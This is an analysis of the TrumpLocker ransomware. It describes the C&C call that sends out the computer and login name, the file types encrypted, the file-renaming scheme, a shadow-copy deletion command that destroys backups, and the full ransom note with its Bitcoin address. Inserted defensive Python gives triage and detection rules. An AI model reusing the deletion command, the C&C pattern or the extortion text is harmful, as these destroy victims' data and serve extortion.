TrumpLocker
TrumpLocker is a ransomware Trojan that takes its name from the image of United States President Donald Trump that it displays as part of its ransom note.

Payload Transmission

TrumpLocker is transmitted through corrupted email attachments.

Infection

A TrumpLocker infection starts when a user launches the TrumpLocker.exe file. When this file executes, the first thing it does is connect to its C&C server by accessing the following URL:

https://3q27hfpradjovwyo.onion.cab/ran/gen.php?u=[computer-name]\[login-name]

By default, the C&C server responds with a public key to encrypt the victim's files with, along with the ransom amount in USD and Bitcoin. Currently, the ransom fee is set to 0.145 Bitcoin, which is around $165.

After receiving the public encryption key, the ransomware starts the file encryption process, which does not follow regular conventions. Like other ransomware families, TrumpLocker has a list of file types it targets for encryption. What's different is that TrumpLocker fully encrypts certain file types, while for others it only encrypts the first 1024 bytes of each file. This behavior has previously been spotted only in VenusLocker variants.
TrumpLocker fully encrypts the following file types:

.txt, .ini, .php, .html, .css, .py, .c, .cpp, .cc, .h, .cs, .log, .pl, .java, .doc, .dot, .docx, .docm, .dotx, .dotm, .rtf, .wpd, .docb, .wps, .msg, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .class, .jar, .csv, .xml, .dwg, .dxf, .asp

However, the file types below are only encrypted partially during a TrumpLocker attack:

.asf, .pdf, .xls, .docx, .xlsx, .mp3, .waw, .jpg, .jpeg, .txt, .rtf, .doc, .rar, .zip, .psd, .tif, .wma, .gif, .bmp, .ppt, .pptx, .docm, .xlsm, .pps, .ppsx, .ppd, .eps, .png, .ace, .djvu, .tar, .cdr, .max, .wmv, .avi, .wav, .mp4, .pdd, .php, .aac, .ac3, .amf, .amr, .dwg, .dxf, .accdb, .mod, .tax2013, .tax2014, .oga, .ogg, .pbf, .ra, .raw, .saf, .val, .wave, .wow, .wpk, .3g2, .3gp, .3gp2, .3mm, .amx, .rpt, .avs, .bik, .dir, .divx, .dvx, .evo, .flv, .qtq, .tch, .rts, .rum, .rv, .scn, .srt, .stx, .svi, .swf, .trp, .vdo, .wm, .wmd, .wmmp, .wmx, .wvx, .xvid, .3d, .3d4, .3df8, .pbs, .adi, .ais, .amu, .arr, .bmc, .bmf, .cag, .cam, .dng, .ink, .ini, .jif, .jiff, .jpc, .jpf, .jpw, .mag, .mic, .mip, .msp, .nav, .ncd, .odc, .odi, .opf, .qif, .xwd, .abw, .act, .adt, .aim, .ans, .asc, .ase, .bdp, .bdr, .bib, .boc, .crd, .diz, .dot, .dotm, .dotx, .dvi, .dxe, .mlx, .err, .euc, .faq, .fdr, .fds, .gthr, .idx, .kwd, .lp2, .ltr, .man, .mbox, .msg, .nfo, .now, .odm, .oft, .pwi, .rng, .rtx, .run, .ssa, .text, .unx, .wbk, .wsh, .7z, .arc, .ari, .arj, .car, .cbr, .cbz, .gz, .gzig, .jgz, .pak, .pcv, .puz, .rev, .sdn, .sen, .sfs, .sfx, .sh, .shar, .shr, .sqx, .tbz2, .tg, .tlz, .vsi, .wad, .war, .xpi, .z02, .z04, .zap, .zipx, .zoo, .ipa, .isu, .jar, .js, .udf, .adr, .ap, .aro, .asa, .ascx, .ashx, .asmx, .asp, .indd, .asr, .qbb, .bml, .cer, .cms, .crt, .dap, .htm, .moz, .svr, .url, .wdgt, .abk, .bic, .big, .blp, .bsp, .cgf, .chk, .col, .cty, .dem, .elf, .ff, .gam, .grf, .h3m, .h4r, .iwd, .ldb, .lgp, .lvl, .map, .md3, .mdl, .nds, .pbp, .ppf, .pwf, .pxp, .sad, .sav, .scm, .scx, .sdt, .spr, .sud, .uax, .umx, .unr, .uop, .usa, .usx, .ut2, .ut3, .utc, .utx, .uvx, .uxx, .vmf, .vtf, .w3g, .w3x, .wtd, .wtf, .ccd, .cd, .cso, .disk, .dmg, .dvd, .fcd, .flp, .img, .isz, .mdf, .mds, .nrg, .nri, .vcd, .vhd, .snp, .bkf, .ade, .adpb, .dic, .cch, .ctt, .dal, .ddc, .ddcx, .dex, .dif, .dii, .itdb, .itl, .kmz, .lcd, .lcf, .mbx, .mdn, .odf, .odp, .ods, .pab, .pkb, .pkh, .pot, .potx, .pptm, .psa, .qdf, .qel, .rgn, .rrt, .rsw, .rte, .sdb, .sdc, .sds, .sql, .stt, .tcx, .thmx, .txd, .txf, .upoi, .vmt, .wks, .wmdb, .xl, .xlc, .xlr, .xlsb, .xltx, .ltm, .xlwx, .mcd, .cap, .cc, .cod, .cp, .cpp, .cs, .csi, .dcp, .dcu, .dev, .dob, .dox, .dpk, .dpl, .dpr, .dsk, .dsp, .eql, .ex, .f90, .fla, .for, .fpp, .jav, .java, .lbi, .owl, .pl, .plc, .pli, .pm, .res, .rsrc, .so, .swd, .tpu, .tpx, .tu, .tur, .vc, .yab, .aip, .amxx, .ape, .api, .mxp, .oxt, .qpx, .qtr, .xla, .xlam, .xll, .xlv, .xpt, .cfg, .cwf, .dbb, .slt, .bp2, .bp3, .bpl, .clr, .dbx, .jc, .potm, .ppsm, .prc, .prt, .shw, .std, .ver, .wpl, .xlm, .yps, .1cd, .bck, .html, .bak, .odt, .pst, .log, .mpg, .mpeg, .odb, .wps, .xlk, .mdb, .dxg, .wpd, .wb2, .dbf, .ai, .3fr, .arw, .srf, .sr2, .bay, .crw, .cr2, .dcr, .kdc, .erf, .mef, .mrw, .nef, .nrw, .orf, .raf, .rwl, .rw2, .r3d, .ptx, .pef, .srw, .x3f, .der, .pem, .pfx, .p12, .p7b, .p7c, .jfif, .exif, .docb, .xlt, .xltm, .xlw, .ppam, .sldx, .sldm, .class, .db, .pdb, .dat, .csv, .xml, .spv, .grle, .sv5, .game, .slot, .aaf, .aep, .aepx, .plb, .prel, .prproj, .eat, .ppj, .indl, .indt, .indb, .inx, .idml, .pmd, .xqx, .svg, .as3, .as

When performing the encryption, TrumpLocker first checks whether the file extension is in the full encryption list. If it is, it fully encrypts the file regardless of whether that same extension is also in the partial list. When encrypting a file, it base64-encodes the original filename and then appends the encrypted extension at the end.
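As an added triage helper (not code from the page or from any analysis tool), the following Python applies the renaming and precedence rules described above to a post-infection directory listing: it base64-decodes a renamed file back to its original name, decides which list governs it (the full list wins when an extension is in both), and reports how many bytes past the 1024-byte prefix survived intact in a partially encrypted file. The appended extension and the sample listing are placeholder and constructed values, and the extension lists are abbreviated.

```python
import base64
import binascii
import os

# Abbreviated versions of the two extension lists given above; the real lists
# are much longer. Note that .docx and .txt appear in both lists.
FULL_ENCRYPT = {".txt", ".php", ".py", ".c", ".java", ".doc", ".docx",
                ".xls", ".xlsx", ".ppt", ".pptx", ".csv", ".xml"}
PARTIAL_ENCRYPT = {".pdf", ".mp3", ".jpg", ".zip", ".rar", ".psd", ".mp4",
                   ".avi", ".wav", ".docx", ".txt", ".7z"}
PARTIAL_BYTES = 1024  # only the leading 1024 bytes of partial-list files are encrypted

# The page does not name the extension TrumpLocker appends, so this is a placeholder.
ENCRYPTED_SUFFIX = ".PLACEHOLDER_LOCKED_EXT"

def decode_original_name(encrypted_name, suffix=ENCRYPTED_SUFFIX):
    """Undo the renaming: strip the suffix, base64-decode the rest; None if not this scheme."""
    if not encrypted_name.endswith(suffix):
        return None
    encoded = encrypted_name[:-len(suffix)]
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def encryption_mode(original_name):
    """Precedence rule: the full list wins even if the extension is also in the partial list."""
    ext = os.path.splitext(original_name)[1].lower()
    if ext in FULL_ENCRYPT:
        return "full"
    if ext in PARTIAL_ENCRYPT:
        return "partial"
    return "untouched"

def triage(encrypted_name, size, suffix=ENCRYPTED_SUFFIX):
    """Return the original name, how it was encrypted, and how many trailing
    bytes are still intact (everything past the first 1024 for partial files)."""
    original = decode_original_name(encrypted_name, suffix)
    if original is None:
        return None
    mode = encryption_mode(original)
    intact = {"full": 0, "partial": max(size - PARTIAL_BYTES, 0), "untouched": size}[mode]
    return {"original": original, "mode": mode, "intact_bytes": intact}

if __name__ == "__main__":
    # Constructed listing: base64("report.docx") and base64("movie.mp4") plus the suffix
    for name, size in [("cmVwb3J0LmRvY3g=" + ENCRYPTED_SUFFIX, 40_000),
                       ("bW92aWUubXA0" + ENCRYPTED_SUFFIX, 5_000_000)]:
        print(triage(name, size))
```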
This operation makes the identification of sensitive files much harder.

Once the encryption process ends, TrumpLocker focuses on showing its ransom demands. This happens in three ways, through a convoluted process. First, the ransomware drops a file named "What happen to my files.txt" on the user's desktop, which reads:

--- The Trump Locker ---

Unfortunately, you are hacked.

1. What happened to my files?

Your personal files, including your photos, documents, videos and other important files on this computer, have been encrypted with RSA-4096, the strongest encryption algorithm. RSA algorithm generates a public key and a private key for your computer. The public key was used to encrypt your files a moment ago. The private key is necessary for you to decrypt and recover your files. Now, your private key is stored on our secret Internet server. And there is no doubt that no one can recover your files without your private key. For further information about RSA algorithm, please refer to https://en.wikipedia.org/wiki/RSA_(cryptosystem)

2. How to decrypt my files?

To decrypt and recover your files, you have to pay #ramt# US Dollars for the private key and decryption service. Please note that you have ONLY 72 HOURS to complete your payment. If your payment do not be completed within time limit, your private key will be deleted automatically by our server. All your files will be permanently encrypted and nobody can recover them. Therefore, it is advised that you'd better not waste your time, because there is no other way to recover your files except making a payment.

3. How to pay for my private key?

There are three steps to make a payment and recover your files:

1). For the security of transactions, all the payments must be completed via Bitcoin network. Thus, you need to exchange #ramt# US dollars (or equivalent local currencies) to Bitcoins, and then send these Bitcoins (about #btc# BTC) to the following address.
1N82pq3XovKoJYqUmTrRiXftpNHZyu4jyv

2). Send your personal ID to our official email: TheTrumpLocker@mail2tor.com
Your personal ID is: #id#

3). You will receive a decryptor and your private key to recover all your files within one working day.

4. What is Bitcoin?

Bitcoin is an innovative payment network and a new kind of money. It is based on an open-source cryptographic protocol that is independent of any central authority. Bitcoins can be transferred through a computer or a smartphone withour an intermediate financial institution.

5. How to make a payment with Bitcoin?

You can make a payment with Bitcoin based on Bitcoin Wallet or Based on Perfect Money. You can choose the way that is more convenient for you.

About Based on Bitcoin Wallet

1) Create a Bitcoin Wallet. We recommend Blockchain.info (https://blockchain.info/)
2) Buy necessary amount of Bitcoins. Our recommendations are as follows.
LocalBitcoins.com -- the fastest and easiest way to buy and sell Bitcoins.
CoinCafe.com -- the simplest and fastest way to buy, sell and use Bitcoins.
BTCDirect.eu -- the best for Europe.
CEX.IO -- Visa / MasterCard
CoinMama.com -- Visa / MasterCard
HowToBuyBitcoins.info -- discover quickly how to buy and sell Bitcoins in your local currency.
3) As mentioned above, send about #btc# BTC (equivalent to #ramt# USD) to our Bitcoin receiving address.
4) As mentioned above, and then, send us your personal ID via email, you will receive your private key soon.

About Based on Perfect Money

1) Create a Perfect Money account. (https://perfectmoney.is)
2) Visit to PMBitcoin.com. (https://pmbitcoin.com/btc) input our Bitcoin receiving address in the "Bitcoin Wallet" textbox. input #ramt# in the "Amount" textbox, the amount of Bitcoin will be calculated automatically. click "PAY" button, then you can complete you payment with your Perfect Money account and local debit card.

6. If you have any problem, please feel free to contact us via official email.
Best Regards
The Trump Locker Team

Then, TrumpLocker drops a file named uinf.uinf on disk, which contains the responses from the C&C server. This file acts as a configuration file and is used by the RansomNote.exe program. The next step is for TrumpLocker to extract a file named RansomNote.exe from the main installer (TrumpLocker.exe), which it drops on the user's desktop. After this, the ransomware executes the following command, which deletes local shadow volume copies, making recovery of previous file versions impossible:

C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit

It then changes the user's wallpaper to the following image, which it downloads from this Imgur URL: http://i.imgur.com/g4Ly4AD.jpg

The final step is to execute the RansomNote.exe file that the ransomware left on the user's desktop in an earlier step. When this file executes, it shows a splash image portraying Donald Trump and the text "YOU ARE HACKED!!" This image does not stay long on the victim's screen and is replaced by a new window, which shows ransom payment information. Once again, this is another dead giveaway that TrumpLocker and VenusLocker are related, as both screens are nearly identical.
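As an added detection example (not from the page), the following Python rules match the post-encryption behaviours just described, the wmic shadow copy deletion, the desktop artifacts dropped by the installer and the wallpaper host lookup, over constructed Sysmon-style telemetry records; the field names and sample events are assumptions, and the host-level score requires two distinct behaviours so that a lone i.imgur.com lookup does not alert on its own.

```python
import re

# Detection rules keyed on the behaviours described in the text. Field names follow
# Sysmon-style naming, but every record below is constructed for this example.
SHADOW_DELETE = re.compile(r"\bshadowcopy\s+delete\b", re.IGNORECASE)
DROPPED_ARTIFACTS = ("\\desktop\\ransomnote.exe",
                     "\\desktop\\what happen to my files.txt",
                     "\\uinf.uinf")
WALLPAPER_HOST = "i.imgur.com"

def classify_event(event):
    """Return the names of the TrumpLocker behaviours a single record exhibits."""
    hits = []
    kind = event.get("EventType")
    if kind == "ProcessCreate":
        image = event.get("Image", "").lower()
        if image.endswith("\\wmic.exe") and SHADOW_DELETE.search(event.get("CommandLine", "")):
            hits.append("shadow_copy_deletion")
    elif kind == "FileCreate":
        target = event.get("TargetFilename", "").lower()
        if any(target.endswith(artifact) for artifact in DROPPED_ARTIFACTS):
            hits.append("ransom_artifact_dropped")
    elif kind == "DnsQuery":
        if event.get("QueryName", "").lower() == WALLPAPER_HOST:
            hits.append("wallpaper_download_lookup")
    return hits

def score_host(events, threshold=2):
    """Aggregate distinct behaviours seen on one host; alert at or above the threshold."""
    seen = set()
    for event in events:
        seen.update(classify_event(event))
    return {"behaviours": sorted(seen), "alert": len(seen) >= threshold}

SAMPLE_EVENTS = [  # constructed records, in the order the text describes the steps
    {"EventType": "FileCreate", "Image": r"C:\Users\alice\Desktop\TrumpLocker.exe",
     "TargetFilename": r"C:\Users\alice\Desktop\What happen to my files.txt"},
    {"EventType": "FileCreate", "Image": r"C:\Users\alice\Desktop\TrumpLocker.exe",
     "TargetFilename": r"C:\Users\alice\Desktop\RansomNote.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Users\alice\Desktop\TrumpLocker.exe",
     "CommandLine": r"C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit"},
    {"EventType": "DnsQuery", "Image": r"C:\Users\alice\Desktop\TrumpLocker.exe",
     "QueryName": "i.imgur.com"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic.exe os get caption"},  # benign admin use, must not match
]

if __name__ == "__main__":
    print(score_host(SAMPLE_EVENTS))
```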